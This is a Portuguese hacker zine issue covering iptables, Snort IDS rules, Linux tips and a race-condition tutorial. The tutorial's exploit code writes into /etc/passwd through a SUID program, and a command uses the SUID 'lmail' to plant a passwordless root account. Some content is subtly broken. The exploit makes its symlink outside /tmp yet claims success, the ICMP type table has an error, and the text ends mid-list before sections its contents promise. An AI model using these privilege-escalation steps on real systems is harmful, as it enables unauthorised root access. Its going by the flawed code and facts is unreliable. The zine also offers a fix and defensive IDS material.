


      ...._________ ________ ______ _____ _____ _ ____  
       ...______         \\___|         |__|  |___|   .
         ..______   ___   \\__|___   ___|__|  |___|   .
            ._____        /______|   ______|  |___|   _
              ____ ______/_______|   ______|  |___|   __
                ___       \\_____|   ______|   ___    ___.
                  _  ___   \\____|   ______|  |___|   ____..
                   .       /_____|   ______|  |___|   _____...
                    ._____/______|________ |__|___|________....
                                                  dec0d3r.......




[---------------------------]
[---"Breaking The Head  "---]
[---"Edicao 01          "---] 
[---"Data 03/08         "---]
[---"hophet@yahoo.com.br"---]
[---------------------------]



Onde Conseguir a "bth":

Sites Oficiais
http://www.bthzine.cjb.net 
http://hophet.hobbiton.org



Escritores da edicao:

Nome: Gustavo Chagas (founder)
Nick: Hophet a.k.a Pol Meyen
email: hophet@yahoo.com.br

Nome: Eduardo Amendola
Nick: Blood_Sucker
email: blooding@punkmail.com



["----------------------------------------------------------------"]

["Conteudo:"]                                           ["Autores:"]

[1 ] [--- Introducao                          ---] [ Hophet        ]
[2 ] [--- Firewall - Parte 1                  ---] [ Hophet        ]
[3 ] [--- IDS - Parte 2                       ---] [ Hophet        ]
[4 ] [--- Race Condition                      ---] [ Hophet        ]
[5 ] [--- Linux                               ---] [ Hophet        ]   
[6 ] [--- Clonagem de Celulares - Finalizando ---] [ Blood_Sucker  ]
[7 ] [--- Curso de Telecomunicacoes - Parte 1 ---] [ Blood_Sucker  ] 
[8 ] [--- Backdoor Chagas - LKM               ---] [ Hophet        ]
[9 ] [--- Desafios da Edicao                  ---] [ Hophet        ]
[10] [--- Links                               ---] [ Hophet        ]
[11] [--- Terminando                          ---] [ Hophet        ]

["----------------------------------------------------------------"]





[1] .
    .\
    ..\
    ...\
    ....\
    [------------------]
    [--- Introducao ---]
    [------------------]
                   \....
                    \...
                     \..
                      \.  




OBS.: O publico alvo eh o pessoal "Fucador Etico" entao se vc
altera Home pages ou pratica qualquer outro ato de Script
Kiddies ou crackers por favor nao leia, porque voce nao vai
encontrar nada de util aqui e em  nenhum txt que venha escrever.

Escrito por Hophet vulgo Pol Meyen.
<hophet@yahoo.com.br>
obs.: Quando houver contribuicoes dos fucadores, elas serao
citadas.

Opa!!! Estou novamente aqui pra trazer mais um pouco de informacao
pra comunidade. Quero dizer que nao eh facil colocar aqui as linhas
que voce veh, mas com esforco e dedicacao a um certo abjetivo
nos conseguiremos chegar lah. A 00 passou, e na 01 continuaremos
com alguns topicos que comecamos na 00, nas zines sempre 
haverah um certo seguimento de assuntos pelo fato de ser quase que
impossivel colocar e abordar todo um assunto em um unico texto 
ou zine, por isso alguns assuntos terao alguns seguimentos.

Aproveitando a Introducao aqui eu voh falar um pouquinho da falada
"etica", vejo por aih varias discucoes as vezes interminaveis sobre
etica onde uns falam as mesmas coisas outros coisas diferentes,
e ainda nao se chega a um consenso geral. Meu pensamento sobre isso
eh bem simples existem varias definicoes de "etica" pelo mundo 
afora, vc deve nao seguilas, mas sim intendelas e tirar suas
proprias definicoes de "etica" e tambem sua "ideologia" neste 
mundo virtual, voce deve ter conciencia do certo e do errado,
do viavel e do inviavel, pra assim crescer mentaltemente e, acima
de tudo crescer como pessoa. 


PS.: Voce pode extrair os sources da edicao usando o extract
que veio em conjunto a edicao. Use:
$ gcc extract.c -o extract
$ ./extract bth01.txt 
Pronto os sources foram extraidos:).
    

 

[2] .
    .\
    ..\
    ...\
    ....\
    [--------------------------]
    [--- Firewall - Parte 1 ---]
    [--- Por Hophet         ---]
    [--------------------------]
                           \....
                            \...
                             \..
                              \.

     


Nesta 1a parte de varias sobre firewall eu vou comecar falando
sobre as novidades no "netfilter" que comeca a vir no kernel 
2.4.x, as mudancas sao poucas e voce que ja esta familiarizado 
com o "ipchains" nao tera dificuldade para se adaptar ao 
"iptables". o Netfiter eh a evolucao do ipchains. No netfilter
a ferramenta de regras de firewall eh o "iptables", muito parecido
com o ipchains.

A sintexe: 


  iptables comando parametros extensoes


Os comandos:

-A -> Acrescenta uma regra ao firewall.
-I -> Insere uma nova regra dentro das ja existentes no firwall.
-D -> Exclue uma regra no firewall.
-P -> Define a regra padrao do firewall.
-L -> Lista regras existentes no firewall.
-F -> Zera todas as regras no firewall(flush).
-h -> Invoca help.
-R -> Substitui uma regra no firewall.
-C -> Checa as regras basicas do firewall.
-Z -> Zera uma unica regra.
-N -> Cria uma nova regra com um nome.
-X -> Exclue uma regra especifica por seu nome.

Os parametros:

-p! (protocolo) -> Define o protocolo TCP/IP a ser tratado: 
TCP, UDP, ICMP

-s!(origem)/ -d!(destino) -> Define o endereco de origrem(-S) e de 
destino(-D) que a regra agirah. Ele possue dois argumentos, 
endereco/mascara e porta. ex.: -S 100.102.123.10/24 80.

-i!(interface) -> Define o nome da interface onde passarao os pacotes
de entrada e saida do firewall. ex.: -W eth1.

-j!(ir para) -> Redireciona uma acao desde que as regras sejam similares.

-f!(fragmento) -> Trata datagramas fragmentados.


Os comandos e os parametros sao igualzinhos aos do ipchains.


As extensoes:

Esta eh a novidade no "iptables", as extensoes facilitam bastante
na montagem de nossas regras.


Veja:


-sport [!][port:port] -dport [!] [port:port] -> Utilizado tambem 
em conjunto com o comando -m. Trata-se de um redirecionamento de 
portas origem(-sport) e portas destino(-dport), pode ate definir 
um numero padrao de portas para o acesso(port:port). Portas
TCP ou UDP.

-mac-source[!] endereco -> especifica qual a placa de rede, atraves
de seu MAC, que ira transmitir pacotes atraves do firewall.

-icmp-type[!] tipo -> Especifica quais os tipos de pacotes ICMP
podem passar ou nao pelo firewall. Aqui vao alguns mais utilizados:

-------------------------------------------
|     Mensagem      |   Tipo   |  Codigo  |
-------------------------------------------
| Echo-request      |     8    |     0    |
-------------------------------------------
| Echo-reply        |     3    |     0    |
-------------------------------------------
| Source-quench     |     4    |     0    |
-------------------------------------------
| Time-exceeded     |    11    |     0    |
-------------------------------------------
     

[!] --syn -> Especifica o uso dos ACK e FIM em requisicoes SYN TCP.

Ps.: As "opcoes" continuam as mesmas.


Vamos ah alguns exemplos e aplicacoes... :

no Ipchains seria:

/sbin/ipchains -A input -p udp -j ACCEPT -s 0.0.0.0/0 -d 100.11.12.3 53

no iptables seria:

/sbin/iptables -A forward -m tcp -s 100.11.12.0/0 --dport 53 -d 0/0
-j ACCEPT

                           ^  
Isto habilitaria um DNS. --|

Outra:

No ipchains seria:

/sbin/ipchains -A input -p tcp -j ACCEPT -s 0.0.0.0/0 -d 100.11.12.3 80
/sbin/ipchains -A input -p tcp -j ACCEPT -s 100.11.12.3 -d 0.0.0.0/0 80

No iptables seia:

/sbin/iptables -A forward -m tcp -s 100.11.12.3/0 --sport 80 -d 0/0 -j 
ACCEPT

/sbin/iptables -A forward -m tcp -s 100.11.12.3/0 --dport 80 -d 0/0 -j
ACCEPT 

                           ^   
Isto habilitaria um HTTP --|


Estas explicacoes foram somente para mostrar as novidades do 
"iptables" e novatos em "firewalls" que nao conhecem o "ipchains" 
talvez nao poderam acompanhar a materia, mas nas proximas edicoes 
procurarei falar sobre o "ipchains" e auxiliares. Ate lah.






[3] .
    .\
    ..\
    ...\
    ....\
    [---------------------]
    [--- IDS - Parte 2 ---]
    [--- Por   Hophet  ---]
    [---------------------] 
                      \....
                       \...
                        \..
                         \.

                          



Aih vai uma definicao que faltou na materia passada.


NIDS, "Network Intrusion Detection System", basicamente eh um
sistema de deteccao de intrusos que trabalha somente na rede,
ou seja ele ao inves de analizar pacotes recebidos em todo o 
sistema,ele somente analiza o que chega a "placa de rede".Ele
analiza tudo que chega baseando-se em regras ou assinaturas.



SNORT
-----

Continuando nossos passos pelos IDS's, vamos falar nesta segunda 
parte de um IDS muito uzado pelos admin's , seu nome eh "snort".
Hoje vou falar um pouco do Snort que realmente eh muito utilizado 
em muitas redes espalhadas pelo mundo. Ele eh muito interecante 
de se trabalhar e dependendo do administrador ele pode ser uma 
poderosa ferramenta, paralizando a maioria dos ataques a uma rede,
ele tambem checa assinaturas e sao nestas assinaturas que esta o
seu poder, as assinaturas na realidade sao regras que o snort le
e poe em aplicacao no sistema onde ele esta sendo utilizado.

Ele analiza o trafico em tempo real e detecta varios ataques como
buffer overflows, port scans, CGI Ataques, e muitos outros.

Voce pode obtelo em "www.snort.org". Depois de baixalo e instalalo
vamos a algumas configuracoes e utilizacoes.
PS.: Aconselho a leitura dos arquivos README e INSTALL para mais
informacoes.


Regras:
------

Vou explicar rapidamente como montar regras para o snort, a 
sintexe eh a seguinte (tudo na mesma linha):


<funcao> <protocolo> <ip_origem/mask> <intervalo_porta_origem> ->
<ip_destino> <intervalo_porta_destino> <opcoes>


Algumas opcoes sao as seguintes: 

msg : Mensagem que vai sair no arquivo de log/alerta.
logto : File pra logar alertas especificos.
content : Essa opcao le o conteudo do pacote a procura 
de exploitacoes. 


Alguns exemplos de regras :


alert tcp any any -> any 21 (msg:"Atras de Quote site exec!";
content:"quote site exec";)


alert tcp any any -> any 21 (msg:"Atras de Format Bug!";
content:"site exec %p";)

alert tcp any any -> any any (msg:"Possivel Queso FingerPrinting!";
flags: S12;)



Configurando:
-------------


Para informacoes de opcoes de linha de comando use:

# snort -h 


No diretorio de instalacao do snort faca:

snort-1.6.3# mkdir /usr/local/etc/snort
snort-1.6.3# cp *-lib /usr/local/etc/snort
snort-1.6.3# cd /usr/local/etc/snort
snort-1.6.3# vi snort-lib
 
Agora edite o "snort-lib" e mude algumas coisas como:

var HOME_NET <coloque_aki_seu_IP>
ex.: 
var HOME_NET 100.165.2.3/25

Se em sua rede voce tiver um servidor DNS modifique a 
"var DNS_SERVER <IP>".

Pronto agora se tiver que adicionar um arquivos com regras basta
colocar no snort-lib "include <file_regras>", voce tambem pode
modificar e retirar regras que voce nao utilize nos outros 
includes nos *-lib do /usr/local/etc/snort.

Por exemplo coloque os exemplos da secao "Regras" no arquivo
"ex-lib" e copie para "/usr/local/etc/snort". 
OBS.: O aquivo "ex-lib" nao pode ter linhas nulas ou seja linha
em branco.
Agora edite o file "snort-lib" e inclua o seguinte "include ex-lib"
ao seu final, pronto agora eh soh reiniciar o "snort" e as nossas 
regras da secao "Regras" estao aplicadas ao sistema. 



Rodando:
--------

Inicialize o "snort" com:
Ps.: Voce pode colocar estas linhas no rc.local do seu sistema.

# snort -D -A full -i lo -c /usr/local/etc/snort/snort-lib

ou

# snort -D -A full -i eth0 -c /usr/local/snort/etc/snort-lib

Para saber o que faz cada opcao acima leia o README ou 
de um "snort -h", acho que nao eh preciso repitir aqui:).



Logs:
-----

Em alguns casos o snort pede pra voce criar a pasta "/var/log/snort"
para que ele possa salvar seus alerts nesta pasta, verifique 1o
no /var/log/syslog apos rodar o snort. Mas os aquivos de log/alerta
seriam :

/var/log/snort.alert
/var/log/snort/snort.alert
e em algumas novas versoes:
/var/log/snort/ALERT


Algumas saidas do arquivo de alerta:


[**] Atras de Format Bug [**]
09/21-09:47:08.027151 127.0.0.1:1042 -> 127.0.0.1:21
TCP TTL:64 TOS:0x10 ID:305  DF
*****PA* Seq: 0xF0866349   Ack: 0xF01FD1CC   Win: 0x3CB0
TCP Options => NOP NOP TS: 290004 289437

[**] IDS264 MISC DoS ath0 [**]
03/03-17:57:42.613160 192.168.1.3 -> 192.168.1.2
ICMP TTL:55 TOS:0x0 ID:53542 IpLen:20 DgmLen:84
Type:8 Code:0 ID:16229 Seq:1024 ECHO


Finalizando:
------------


Eh aqui termina mais um materia sobre o facinante mundo dos 
IDS's, espero ter ajudado Adimns que realmente se preocupam 
com a seguranca e claro aqueles que querem sempre aprender 
mais:). Na proxima materia sobre IDS espero falar sobre mais
alguns ids's utilizados pelo mundo afora. Ate lah!!








[4] .
    .\
    ..\
    ...\
    ....\
    [--------------------------------------]
    [--- Race Condition                 ---]
    [--- Funcoes que manipulam arquivos ---]
    [--- Por Hophet                     ---]
    [--------------------------------------]
                                       \....
                                        \...
                                         \..
                                          \.
 




* Indice:
---------


1 - Introducao.
2 - Condicoes nao Atomicas - Conceito.
3 - Explorando - Pratica.
4 - Consertando Tudo.
5 - Ultimas Palavras.



1 - Introducao
--------------


PS.: Todos os testes foram feitos em um Slackware 7.0
kernel 2.2.13, 2.2.18.


Fala Pessoal, mais uma vez aqui estou eu trazendo mais 
informacoes a respeito de "race conditions" pra comunidade
fucadora, o objetivo eh documentar mais esta tecnica tao
pouco falada e aplicada. Espero que o pessoal venha usar
as informacoes aqui contidas pra crescer em conhecimento
e tambem aumentar um pouco mais a visao do fucador nos
possiveis esquemas, utilizando tal tecnica. 

O problema mais uma vez acontece com a mau programacao
onde desenvolvedores de softs nao se preocupam com a 
seguranca de suas aplicacoes e a partir daih surgem 
exploracoes diversas, mas pra frente veremos onde entra 
isso.

Se pode definir uma Condicao de Corrida(race condition) como
um "Comportamento anomalio devido a uma dependencia excesiva
no tempo relativo transcurrido entre diferentes eventos" 
(traducao de Free On-line Dictionary of Computing).

Estes eventos poden ser desde funcoes que abram um arquivo,
tambem suas permissoes, etc, ate a relacao de valor de alguma
variavel compartilhada por 2 procesos,como ja foi dito antes. 


2 - Condicoes nao atomicas - Conceito
-------------------------------------

As  condicoes nao atomicas ocorrem quando nao se pode assegurar
que uma operacao e a seguinte vao ocorrer de maneira seguida no
processador. Isto ocorre quando depois da primeira operacao, o 
procesador assina um intervalo de tempo a outro processo.
(fundamento da multitarefa em sistemas monoprocessador)

Este eh un exemplo de programa que contem um Race condition em 
funcoes que manipulao arquivos:


------------------------ racevuln.c ---------------------------

<++> race/racevuln.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

#define	ARQUIVO	"/tmp/pol"

int main(void)
{
	FILE *fd;
	struct stat estado, estado2;

	if (access(ARQUIVO, F_OK) < 0)
	{
	   fprintf(stderr,"O arquivo nao existe, criando-o...\n");
	   fd = fopen(ARQUIVO,"a");
	   fprintf(fd, "Eh a primeira vez que se cria o arquivo.\n");
	}
	else
	{
	   fprintf(stdout,"O arquivo ja existe:\n");
           fprintf(stdout,"Adicionando caracteres ao final!\n");

           fd = fopen(ARQUIVO,"r+");
	   if (lstat(ARQUIVO, &estado2) == -1)
	      {
	        perror("lstat");
		exit(-1);
	      }
	      if (S_ISLNK(estado.st_mode))
	         {
		   fprintf(stdout,"Race condition conseguido\n");
		 }			
	      fseek(fd, 0, SEEK_END);
              fprintf(fd,"Ola Fucadores!\n"); 
	}
	fclose(fd);
	return(0);
}

<-->

--------------------------- racevuln.c -----------------------------

Compile este programa como root e sete o bit SUID root para nossos
testes:

sh-2.03# gcc racevuln.c -o racevuln
sh-2.03# chmod +s racevuln


O que este programa, basicamente, faz eh:

   1- Comprovar a existencia do arquivo "pol" no diretorio /tmp.
   2- Se nao existe, ele cria e escreve uma notificacao conforme eh a 
      primeira vez que se escreve no arquivo.
   3- Se existe, abre o arquivo e escreve "Ola Fucadores!".

Alen disso, eh adicionado um fragmento de codigo que comprove se foi 
produzido uma race condition ou nao. (Isto eh irrelevante para demonstrar
como ocorre realmente). 

Estas operacoes sao muito comuns em quase todos os programas existentes.

Mas que ocorreria se depois de comprovar a existencia do arquivo com
a chamada de sistema  access() e justo antes de abrilo con fopen(),  
outro programa interfirisse e tomasse o arquivo por um link simbolico?

Como podemos  imaginar, o programa, efetivamente abriria /tmp/pol,porem
ele seria um link, realmente estaria operando sobre o arquivo a que ele
aponta, pelo que adicionaria dados ao final do mesmo.

Este fato pode permitir criar novos arquivos ou alterar os ja 
existentes. Com isso podemos imaginar muitas coisas possiveis
e realmente sao muitas.



3 - Explorando - Pratica
------------------------


O metodo mais simples, sim nao eh o mais "claro", de demonstrar este 
erro de programacao eh fazer executar em um loop o programa vulneravel
e varias ordens que permitirao tomar o arquivo que se escreve a outro
de seu enlace(link).

Aqui vai um simples exploit que vai realizar o trabalho pra gente,
mais isto poderia ser feito "na unha". O que ele faz eh 1o remover
qlq arquivo "pol" do /tmp, criar um link simbolico pra "/etc/passwd" 
com o nome de "pol" e rodar o nosso programa vulneravel, assim
ele ao inves de escrever em /tmp/pol ele ira escrever no /etc/passwd.
Nao esqueca de fazer um backup do "/etc/passwd" antes de tentar isso.


----------------------------- exploit.c -----------------------------

<++> race/exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv)
{

	if (argc < 2)
	{
	   fprintf(stderr,"Use: %s <programa>\n",argv[0]);
	   exit(-1);
	}

	while (1)
	{
	   system("rm -rf /tmp/pol;ln -s /etc/passwd pol");
           system(argv[1]); 
           break;      
	}
	
	return(0);
}

<-->

----------------------------- exploit.c ------------------------------



Agora vamos aplicar o exploit em cima do "racevuln":

Veja:

sh-2.03$ ls -l
-rwsr-sr-x   1 root     root        15553 Jul  8 05:09 racevuln
-rw-r--r--   1 hophet   users         808 Jul  8 04:06 racevuln.c
-rwxr-xr-x   1 hophet   users       12112 Jul  8 04:08 exploit
-rw-r--r--   1 hophet   users         329 Jul  8 04:08 exploit.c

sh-2.03$ ./exploit racevuln
O arquivo ja existe:
Adicionando caracteres ao final.

Pronto, rodamos o nosso exploit em cima do programa vulneravel, agora
vamos ver o que aconteceu com o /etc/passwd.

Veja:

sh-2.03$ cat /tmp/pol
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:1::/home/ftp:/bin/bash
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
nobody:x:99:99:nobody:/:
hophet:x:1000:100:Hophet,,,:/home/hophet:/bin/bash
crist:x:1001:100::/home/crist:/bin/bash
cairo:x:1002:100:,,,:/home/cairo:/bin/bash
mp3:x:777:777:mp3 player:/home/mp3:/bin/bash
pol:x:1003:100:Pol Meyen,,,:/home/pol:/bin/bash
Ola Fucadores!

sh-2.03$ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:1::/home/ftp:/bin/bash
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
nobody:x:99:99:nobody:/:
hophet:x:1000:100:Hophet,,,:/home/hophet:/bin/bash
crist:x:1001:100::/home/crist:/bin/bash
cairo:x:1002:100:,,,:/home/cairo:/bin/bash
mp3:x:777:777:mp3 player:/home/mp3:/bin/bash
pol:x:1003:100:Pol Meyen,,,:/home/pol:/bin/bash
Ola Fucadores!


Veja,funciona, o programa escreveu realmente dentro do 
"/etc/passwd". Vemos que com isso podemos realmente modificar
qualquer arquivo dentro do sistema. 

O programa vulneravel acima foi apenas um exemplo pra mostrarlhes
como funciona, mas existem programas onde nos podemos manipular a
saida pra os arquivos temporarios, assim poderiamos colocar no 
"passwd" uma conta "root" realmente. Isso acontece com o agente
de email "lmail" que soh roda com o bit SUID e cria temporarios 
no /tmp onde nos podemos manipular a saida pra o "/etc/passwd", 
vejamos rapidamente um pouco sobre ele.


Veja:


sh-2.03$ ls -l `which lmail`
-rwsr-sr-x   1 root     root         9220 Nov 25  1993 /usr/bin/lmail*

sh-2.03$ echo `perl -e 'print "\n"'`pol::0:0::/root:/bin/bash | lmail -f
lmail: write failed to temp file /tmp/lmail29856

sh-2.03$ cat /tmp/lmail29856
pol::0:0::/root:/bin/bash


Como viram, agora era soh criar o link simbolico pra "/etc/passwd" 
com o nome acima(/tmp/lmail29856) e a conta root 
"pol::0:0:/root:/bin/bash" estaria lah dentro do "/etc/passwd".

Eh, isso realmente eh util e podemos com isso fazer muitas e muitas 
coisas dentro do sistema, basta colocar a cabeca pra pensar e tudo
se abrira a voce:). Poderiamos criar ou modificar servicos, acrescentar
contas como foi demonstrado, modificar log's, entre muitas outras
coisas.

Existem muitos programas vulneraveis a isso basta correr um pouco atras
e ler uns fontes que voce acha um tanto.   



4 - Consertando Tudo.
---------------------


Como o problema eh um Erro de programacao, nao eh muito complicado
resolvelo, basta que os programadores ou fucadores ao criar seus
programas tenham atencao com sua estrutura e com a manipulacao de
arquivos, setanto permissoes,etc. 

Uma das melhores solucoes para este problema eh o codigo seguinte:


------------------------------ solucao.c ----------------------------

<++> race/solucao.c
 
char *filename;
int fd;

do {
	filename = tempnam (NULL, "foo");
	fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
	free(filename);
} while (fd == -1);

<-->

------------------------------ solucao.c ------------------------------
 

Este fragmento de codigo intenta criar un arquivo com um nome temporal 
unico em um loop, ate que ele consegue. Tao simples, como util e seguro.

Basta adicionar este codigo ao "racevuln.c" e aplicar as devidas 
mudancas que ele deixa de ser vulneravel a Race Condition, o mesmo 
pode ser feito com outros programas com o mesmo problema. Eh uma
questao de atencao e cuidado.  




5 - Ultimas Palavras.
---------------------


Como viram "Race Condition" eh muito poderoso e vale a pena
pra um fucador dominar tal "tecnica" pois aumenta bastante 
a visao do mesmo, e com certaza eh e vai ser muito util aos
fucadores. Temos varios casos de RC e com o tempo eles serao
aperfeicoados e aplicados com mais poder e controle. Nosso
caminho eh lento e dificil e estamos nele pra chegar ao 
fim(existe o fim??!:) sempre lutando pela busca a "informacao".

Eh, vou ficando por aqui com minhas humildes palavras, espero ter 
contribuido mais uma vez para o crescimento da comunidade fucadora.

Um abraco a Martini, Blood_Sucker, eSc2, Martin Fallon, 
Ghudin meu mano:) e a todos que tem contribuido para o crescimento 
do hacking verdadeiro.

PS.: Ver a secao "Links" pra links referentes a materia acima.


Um abraco.

Hophet vulgo Pol Meyen.






[5] .
    .\
    ..\
    ...\
    ....\
    [------------------]
    [--- Linux      ---]
    [--- Por Hophet ---]
    [------------------]
                   \....
                    \...
                     \..
                      \. 





* Indice
--------


1 - WinModens & o Linux.
2 - Formatando Disquetes pra 1680kb de capacidade.
3 - System Calls do kernel 2.2.19 
 


[1 - WinModens & o Linux]
-------------------------


Os WinModens sao basicamente modens controlados por soft,
eles foram sofrendo mudancas ate ser o que sao hoje,
ah um tempo atras os modens tinham a sua propria CPU 
que controlava todo o seu funcionamento com essas mudancas
surgiram os winmodens que sao todalmente controlados 
por soft e assim passando as funcoes que eram da CPU do
modem pra CPU da maquina, isso trouxe alguns beneficios
e maleficios tb, um beneficio por exemplo eh o preco,
que caiu bastante, os maleficios sao maiores , os
modens por exemplo passam por muitas falhas , parando 
de responder do nada no meio da conexao ,etc e ate
um tempo atras eles nao funcionavam no linux barrando 
um grande numero de usuarios ou ate fazendo-os comprar
um modem de verdade:), mas hoje isto esta mudando, 
ja existem varios drivers pra linux, alguns como
HSP , etc e a maioria como modulos  , onde vc nao pode
ver o fonte soh carregalos, mas ja eh alguma coisa:).


Onde conseguir estes drivers pra meu WinModem?? Aih vao
alguns links:

http://www.linmodens.org  
http://www.jcmp3.cjb.net --> Tem muitos Aqui.   

Veja qual o seu Winmodem digitando:

# lspci -vv 

Com isso voce vai saber qual o seu winmodem, procure na 
saida algo como modem, winmodem , HSP , HFS , etc. 

Ou abra a maquina e procure lah:).

E baixar nas paginas citadas de acordo com o seu winmodem
o driver, depois de baixar eh soh Seguir os passos do
README ou INSTALL pra instalar o seu winmodem sem problema.

Ou pra se livrar disso tudo compre um "modem" de verdade
eu aconselho "US Robotics(USR) -- ISA" ou um modem 
externo mesmo. Te garanto que a conexao vai ser muito melhor
e mais rapida, e ainda tem alguns modulos(drivers) pra 
winmodem que carrega bastante o sistema e assim fica dificil:/.



[2 - Formatando Disquetes pra 1680kb de capacidade]
--------------------------------------------------


Eh simples ... a bastante util, pois de vez em qdo precisamos
de uns 10kb pra completar a copia e nao da, intao, pra nao 
acontecer mais isso formatamos os nossos disquetes  pra
capacidade de 1.68mb, eh pouco ainda, mais ja ajuda bastante:)

Vamos lah, primeiro formate ele da seguinte maneira:

sh-2.03# fdformat /dev/fd0u1680

Pronto espere um pouco e jah jah estara formatado. 

Acabado a formatacao, vamos criar o File System, faca o seguinte:

sh-2.03# mkfs /dev/fd0u1680

Pronto, com isso voce criou o file system(sistemas de arquivos) 
e agora voce ja pode salvar aquele seu arquivo.

Vamos monta-lo, para que enfim possamos usar nosso disquete de 
1680kb de capacidade, faca o sequinte:

sh-2.03# mount /dev/fd0u1680 /floppy 

Pronto agora voce pode usar sem problemas o seu super disquete:)
que esta montado em "/floppy".

Duvidas consulte as man-pages "fdformat", "mkfs", "mount".
 



[3 - System Calls do kernel 2.2.19]
-----------------------------------


Ae, tah indo a lista de system calls do kernel 2.2.19 pra quem
quizer usar nas suas viagens pelos LKMs:), a mesma pode ser 
obtida em "/usr/include/asm/unistd.h" do seu sistema ou em 
"/usr/src/linux-2.2.19/include/asm/unistd.h" no caso do kernel
2.2.19. Esta aih.

/*
 * Esta lista contem os numeros dos respectivos system calls.
 */

#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
#define __NR_link                 9
#define __NR_unlink              10
#define __NR_execve              11
#define __NR_chdir               12
#define __NR_time                13
#define __NR_mknod               14
#define __NR_chmod               15
#define __NR_lchown              16
#define __NR_break               17
#define __NR_oldstat             18
#define __NR_lseek               19
#define __NR_getpid              20
#define __NR_mount               21
#define __NR_umount              22
#define __NR_setuid              23
#define __NR_getuid              24
#define __NR_stime               25
#define __NR_ptrace              26
#define __NR_alarm               27
#define __NR_oldfstat            28
#define __NR_pause               29
#define __NR_utime               30
#define __NR_stty                31
#define __NR_gtty                32
#define __NR_access              33
#define __NR_nice                34
#define __NR_ftime               35
#define __NR_sync                36
#define __NR_kill                37
#define __NR_rename              38
#define __NR_mkdir               39
#define __NR_rmdir               40
#define __NR_dup                 41
#define __NR_pipe                42
#define __NR_times               43
#define __NR_prof                44
#define __NR_brk                 45
#define __NR_setgid              46
#define __NR_getgid              47
#define __NR_signal              48
#define __NR_geteuid             49
#define __NR_getegid             50
#define __NR_acct                51
#define __NR_umount2             52
#define __NR_lock                53
#define __NR_ioctl               54
#define __NR_fcntl               55
#define __NR_mpx                 56
#define __NR_setpgid             57
#define __NR_ulimit              58
#define __NR_oldolduname         59
#define __NR_umask               60
#define __NR_chroot              61
#define __NR_ustat               62
#define __NR_dup2                63
#define __NR_getppid             64
#define __NR_getpgrp             65
#define __NR_setsid              66
#define __NR_sigaction           67
#define __NR_sgetmask            68
#define __NR_ssetmask            69
#define __NR_setreuid            70
#define __NR_setregid            71
#define __NR_sigsuspend          72
#define __NR_sigpending          73
#define __NR_sethostname         74
#define __NR_setrlimit           75
#define __NR_getrlimit           76
#define __NR_getrusage           77
#define __NR_gettimeofday        78
#define __NR_settimeofday        79
#define __NR_getgroups           80
#define __NR_setgroups           81
#define __NR_select              82
#define __NR_symlink             83
#define __NR_oldlstat            84
#define __NR_readlink            85
#define __NR_uselib              86
#define __NR_swapon              87
#define __NR_reboot              88
#define __NR_readdir             89
#define __NR_mmap                90
#define __NR_munmap              91
#define __NR_truncate            92
#define __NR_ftruncate           93
#define __NR_fchmod              94
#define __NR_fchown              95
#define __NR_getpriority         96
#define __NR_setpriority         97
#define __NR_profil              98
#define __NR_statfs              99
#define __NR_fstatfs            100
#define __NR_ioperm             101
#define __NR_socketcall         102
#define __NR_syslog             103
#define __NR_setitimer          104
#define __NR_getitimer          105
#define __NR_stat               106
#define __NR_lstat              107
#define __NR_fstat              108
#define __NR_olduname           109
#define __NR_iopl               110
#define __NR_vhangup            111
#define __NR_idle               112
#define __NR_vm86old            113
#define __NR_wait4              114
#define __NR_swapoff            115
#define __NR_sysinfo            116
#define __NR_ipc                117
#define __NR_fsync              118
#define __NR_sigreturn          119
#define __NR_clone              120
#define __NR_setdomainname      121
#define __NR_uname              122
#define __NR_modify_ldt         123
#define __NR_adjtimex           124
#define __NR_mprotect           125
#define __NR_sigprocmask        126
#define __NR_create_module      127
#define __NR_init_module        128
#define __NR_delete_module      129
#define __NR_get_kernel_syms    130
#define __NR_quotactl           131
#define __NR_getpgid            132
#define __NR_fchdir             133
#define __NR_bdflush            134
#define __NR_sysfs              135
#define __NR_personality        136
#define __NR_afs_syscall        137 
#define __NR_setfsuid           138
#define __NR_setfsgid           139
#define __NR__llseek            140
#define __NR_getdents           141
#define __NR__newselect         142
#define __NR_flock              143
#define __NR_msync              144
#define __NR_readv              145
#define __NR_writev             146
#define __NR_getsid             147
#define __NR_fdatasync          148
#define __NR__sysctl            149
#define __NR_mlock              150
#define __NR_munlock            151
#define __NR_mlockall           152
#define __NR_munlockall         153
#define __NR_sched_setparam             154
#define __NR_sched_getparam             155
#define __NR_sched_setscheduler         156
#define __NR_sched_getscheduler         157
#define __NR_sched_yield                158
#define __NR_sched_get_priority_max     159
#define __NR_sched_get_priority_min     160
#define __NR_sched_rr_get_interval      161
#define __NR_nanosleep          162
#define __NR_mremap             163
#define __NR_setresuid          164
#define __NR_getresuid          165
#define __NR_vm86               166
#define __NR_query_module       167
#define __NR_poll               168
#define __NR_nfsservctl         169
#define __NR_setresgid          170
#define __NR_getresgid          171
#define __NR_prctl              172
